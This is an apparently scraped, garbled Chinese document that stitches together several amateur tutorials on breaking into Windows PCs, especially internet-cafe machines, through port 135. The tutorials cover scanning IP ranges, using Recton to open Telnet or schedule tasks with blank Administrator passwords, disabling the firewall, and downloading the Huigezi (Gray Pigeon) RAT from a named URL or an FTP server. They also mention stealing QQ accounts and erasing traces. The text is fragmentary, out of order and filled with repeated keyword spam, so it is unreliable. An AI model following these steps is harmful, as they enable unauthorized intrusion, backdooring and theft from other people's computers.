135端口入侵教程灰鸽子自动上线.doc

1、135端口入侵教程灰鸽子自动上线Posted in 2010年 01月 12日 8:37 上午 h.admin没有评论 2009年 09月 24日 星期四 18:35登陆时你可用如下用户名和密码登陆! Logon : AdministratorPassWord : 回车就行了前几天我去各个网吧玩时！没事看他们端口全开 135.139着了。所以让我们入侵更加方便！135端口入侵教程 2008/05/06 12:59 黑客知识 大家好！今天我给大家介绍怎么在网吧捉 135肉鸡！3.3login:处填入 administrator 回车 password 处不灰鸽子黑防版要填直接回车这是我才扫到的

2、！ 现在可能是 因为网段是随便扫的有些慢 没有扫到吧下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢 3389端口，那我就给他上传个开启 3389的脚本，不过对于开启 3389端口的工具网上还真的不少，比如 Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样，就这么轻松得灰鸽子 2009到了一台。是不是很过瘾网上也有很多关于 135端口入侵的教程，要么看上去很深奥，要么模棱两可，菜鸟们摸不着头脑，其实很简单，请看下面：下面我就来介绍一下通过 135端口入侵的方

3、法。（正在连接 222.69.253.2 连接成功！正在检查 Telnet服务状态 正在改变服务状态 正在设灰鸽子自动上线置 NTLM=0 正在设置 端口=23 Telnet服务已经成功打开！端口:23 .3.4进入后输入 net share c=c: (可以砍刀 C盘共享成功)菜鸟煎饼的简单教程，别拿砖头拍我啊我啊网吧的帐号密码全是一样的所以知道了一台就可以了！开始 IP灰鸽子自动上线和结束 就是写网吧的 IP 我教你个办法 你先在运行输入 CMD然后在输入命令 ipconfig 就可以知道你的机子的 IP地址了！在如果你的 IP是 192.1.1.60而网吧有 250台机子你就输入开始 I

4、P为：192.1.1.1本次教程用到工具：1 Recton 免杀版.exe我们直接种鸽子就可以了！我们也可以做了盗 qq什么的还不是随我们！远程工具你们自己找吧，随便什么都行工具有：1.135入侵工具包在点 WMI灰鸽子自动上线扫描 端口我们这里写 135 最后点开始大家好我是 77169的 wywx今天给大家带来的是 135端口入侵教程！前几天看的教程都是要通过 TELNET连接才可以下载到肉鸡上，现在给大家带来的是不用 TELNET连接，直接给肉鸡下载木马要用到的工具是：Recton V2.5 连接用的 这两个工具可以到我的群的共享里下载！NTscan 灰鸽子自动上线扫描用的一个免杀的木马

5、（我这里用鸽子！）一个可以下载的空间首先打开 NTscan，输入一个要扫描的网段，选 WMI扫描 端口写 135然后开始！为了节省时间我已经扫好了！好了下面开始，首先打开 Recton V2.5选择种植者，远程主机输入对方的 IP，这里我们选 218.64.125.8，用户名Administrator密码为空！然后选 HTTP下载 下载你的木马文件目录写你的木马的下载地址！我的是 http:/muma.yi.org/fy.exe启动参数写你的木马的文件灰鸽子自动上线名我的是 fy.exe然后点开始下载有些机子是不可以运行下载命令的，这样的话就没办法了，换一台！看到了吧！命令执行成功，大家慢慢等

6、！ 因为这是在给对方主机添加计划任务！任务运行时间是一分钟后好了时间到了正在运行命令 C:WINNTsystem32fy.exe 命令成功完成！Process ID = 1152 灰鸽子自动上线成功了，我们看看有没有上线！因为我的木马有点大，下载要久一点，大家等等！218.64.125.8 上线了，好了动画结束！有一些机子会出现错误这样的问题我还没解决，如果不行大家就换台肉鸡！886本人第一次做教程，有什么问题大家体谅一下！现在好紧张呢，呵呵！灰鸽子自动上线首先我们需要两个工具，1.啊 D网络工具包 2.02 ，2.Recton v2.5现在开始了通过 135端口入侵实际上是利用 RPC漏洞来

7、攻击计算机的。一般情况下 135端口主要用于使用 RPC（Remote Procedure Call，远程过程调用）135端口入侵教程 2008年 08月 31日 星期日 下午 10:43协议并提供 DCOM（分布式组件对象模型）服务，通过 RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码；3.1灰鸽子自动上线最后是 CMD出场了，点开始运行CMD 输入 telnet 222.xx.253.2 回车，（222.xx.253.2 是我们刚才扫描到的 IP)使用 DCOM可以通过网络直接进行通信，能够跨包括 HTTP协议在内的多种网络传输。RPC 本身在处理通过 TCP/I

8、P的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。会影响到 RPC与 DCOM之间的一个接口，该接口侦听的端口就是 135。我们在用 135工具包！里面有 3款软件我们主要用：ntscan10 RectonD灰鸽子自动上线结束为：192.1.1.250 就可以了2: 现在该 Recton v2.5出场了，运行 Recton v2.5，选择 Telnet，在远程主机填入我们刚才扫描到开放 135端口的主机的 IP，选择开始执行来启动目标主机端口 23的 Telnet服务，利用 135端口入侵之前先准备几个工具1。NTscan 2。recton 3。灰鸽子 4。花生壳（主要

9、是 ADSL来绑定 IP的，否则肉鸡用一次之后到哪去上线？）灰鸽子自动上线下面我们先利用 NTscan来扫一段 IP本次教程名称：135 入侵就先这个了，看看能连上不好了，telnet 已经开好了，接下来我门就 telnet进去OK近来了，接着就要用自己的 FTP下载鸽子了，我们进入 FTP后用 get 文件名 下载我的 FTP从来不设置密码的，呵呵开始下了，等吧速度还可以 40多 K然后 QUIT退出 FTP，用 DIR命令查看我们是否已经下载鸽子了看到了吧，S1。exe，灰鸽子自动上线接着我们运行它，好了等各自上限吧看看他在干什么，呵呵，偷窥的毛病可不好QQ 中今天的教程就到这里吧，对了，

10、如果你的鸽子不免杀的话最好用 recton的进程管理将他的杀毒关掉，最后说句，干完活后一定要把尾巴给清了，88欢迎大家多光顾 WWW.YESHACK.COM135端口入侵教程现在我们打开 s 扫描器 他是一个 很好灰鸽子自动上线的扫描软件 ！是我的一个朋友给我的 如果你还没有 可以到网站上去下载 下载网址是 上边这有例子 就是 这样的 扫描 s.exe tcp 网段 端口 线程 /save 保存的意思 现在我们随便打上一段网段扫描他的 135 这个 s 扫描扫完后会在 才放 S扫描的 D 盘生成一个.txt 文件里边 会有扫到的 ip 灰鸽子自动上线有点慢 等一会以 administrato

11、r 为用户 没有密码 好下面我们随便找一个 ip 用他开着的 135端口来开启他的 23telnet端口 这里用第二项 telnet 有点慢 等一下 135 连接成功了 点 retry 现在手动开启 23端口 Telnet 服务已经成功打开！端口:23 .下面我们来 telnet 它 打开 cmd 灰鸽子自动上线虚拟 dos 登陆 user是 administrator 密码没有 进他的电脑后连接我的 ftp 下载我的鸽子 呵呵 我想进去对方的电脑后做什么就不用我说了吧 你也可以用 radmian 已经进去了 这是我的 ftp 已经登陆 下面看下我的 ftp 呵呵！这里的 Server.exe

12、是我的鸽子 现在下载到 目标用户 下载完成 退出 ok 退出1：我们先运行啊 D工具包，选择 IP端口扫描，填入要扫描的 IP段，端灰鸽子自动上线口选 135，开始扫描吧，如图，在 222.xx.251.1222.xx.253.255这个 IP段我们发现有 N个机子的 135端口是可以利用的；简单吧！今天我给大家讲一下 135 端口找肉鸡 很多人都问我如何用 135 现在不会 的可是要好好的看一下了哈！ 用到的软件有 S 扫描器 ，RectonD 贺免杀专用版 ，cn-ntscan102 啊 D网络工具包（2）得到有漏洞后，我们还有一个功能强大的扫描工具，比如 NTSscn汉化灰鸽子自动上线版

13、。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的 IP路径，在连接共享$处选择“WMI 扫描”，在“扫描打开端口的主机”处填写 135端口。最后点击“开始”即可。要不了多久就会有结果显示。如果有不懂的加我 qq群 27919722 或者 我的 qq 133840626 -Leanker 好了教程做到这里高手勿笑啊！我也是个菜鸟！我在这里做这个教程呢 不是让大家去网吧盗别人的号什么的！我的目的灰鸽子自动上线是让大家多学一点知道！还有开 135.139.445.端口的要注意了网站上教程非常多看下把他们关了！别让别人入侵到了你的机子你才要去关！如果找不到教程请留言我发布相关的教程！谢谢！大家

14、好了我们扫描出来了帐号密码！我们在用 RectonD 进行开他的 telnet服务！或者直接种灰鸽子！本次教程操作系统：Microsoft Windows XP3 远程控制本节讲 135 入侵灰鸽子自动上线好了我不管了 直接用 NT-SCAN贺免杀专用版 这里用 WMI扫描 线程改一下 如果是 在家用 AD 那就 用 150就可以了端口改一下建立 58.223.34.64IPC$ 管道. OK!复制文件到对方主机. OK!读取对方机子的时间. 2007-05-27 19:13 OK!在对方机子添加任灰鸽子自动上线务. OK!1分钟后将自动运行任务! IP:58.223.34.64好了，等会就上

15、线了，来了一台，我在做一次，看我们用 ntscan10进行扫描培植如下这些工具在我的空间里有！好了不废话了继续开讲。QQ群：16164632 .灰鸽子3.2输入 n 回车3.5此时此刻我们现在灰鸽子自动上线就可以用 DOS命令来进行传马了，对于DOS命令不是很熟的朋友可以借用啊 D工具包里的木马种植者进行种植，打开啊 D的木马种植机，输入目标主机的 IP，点击检测共享，然后点开始就可以种植木马了，默认啊 D会自动运行木马，朋友们我的心得都是尝试了好多便才发表的请珍惜啊!net stop sharedaccess 关防火墙net share c$=c: 开共享IP段 我自己的 IP段，那么慢好了

16、 灰鸽子自动上线已经下载到 c:了 我现在鸽子没下来 在网吧 已经进入对方电脑找到肉鸡了 至于挂什么 就不用我说了吧 随便挂个马也可以 挂个鸽子也可以 radmin 也可以 呵呵！ bye 哇好多哈 呵呵！（3）获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的 IP输入TELNET界面的“远程主机”处，灰鸽子自动上线以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把 TELNET打开吧。打开后按 WIN+R输入 CMD进入再输入 Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回

17、车即可进入主机。而且得到的还是 SYSTEM权限。好了！我也不墨迹了！886因为我在录象之前就已经开始扫了，所以现在发现好多开了 135的灰鸽子自动上线我们就随便选择一个吧选好后用 recton来开 TELNET（1）通过 135端口入侵，攻击者首先需要查找网络上存在 135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如 SuperScan就是典型的端口工具之一。在 SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的 IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本灰鸽子自动上线框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的 IP整理下即可。没传进去